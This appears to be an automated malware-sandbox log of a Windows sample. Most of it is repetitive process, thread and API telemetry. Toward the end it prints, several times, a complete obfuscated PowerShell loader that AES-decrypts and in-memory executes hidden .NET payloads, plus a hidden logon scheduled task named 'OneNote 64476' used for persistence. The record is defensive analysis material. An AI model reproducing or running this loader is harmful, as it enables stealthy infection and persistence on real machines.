    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (58 identical entries collapsed)
    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (77 identical entries collapsed)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (11 identical entries collapsed)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4650
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5196
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4402
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2426
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7525
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2144
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7461
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2210
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4708
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3511
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3712
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1106
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7451
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2078
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8294
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1300
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728 | Thread sleep count: 4650 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 | Thread sleep count: 5196 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772 | Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 | Thread sleep count: 4402 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840 | Thread sleep count: 2426 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864 | Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 | Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 | Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 | Thread sleep count: 4708 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep time: -20291418481080494s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052 | Thread sleep count: 3511 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 | Thread sleep count: 3712 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308 | Thread sleep count: 1106 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3288 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3732 | Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 | Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (4 identical entries collapsed)
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A36407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A36407C
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A37B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A38FC20 FindFirstFileExA,0_2_00007FF65A38FC20
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A381624 VirtualQuery,GetSystemInfo,0_2_00007FF65A381624
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (11 identical entries collapsed)
    Source: file.exe, 00000000.00000002.1705956338.000001ACBFD3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: file.exe, 00000000.00000003.1704251351.000001ACBFDC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A3830F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF65A3830F0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A390CA0 GetProcessHeap,0_2_00007FF65A390CA0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (8 identical entries collapsed)
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A3830F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF65A3830F0
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A382490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF65A382490
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A3832D4 SetUnhandledExceptionFilter,0_2_00007FF65A3832D4
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A387658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF65A387658
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF65A37B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" "
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 
5).Substring(2))));$SgTUK=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\mhk.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 5).substring(2))));$sgtuk=ummxi 
(tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network64476man.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function 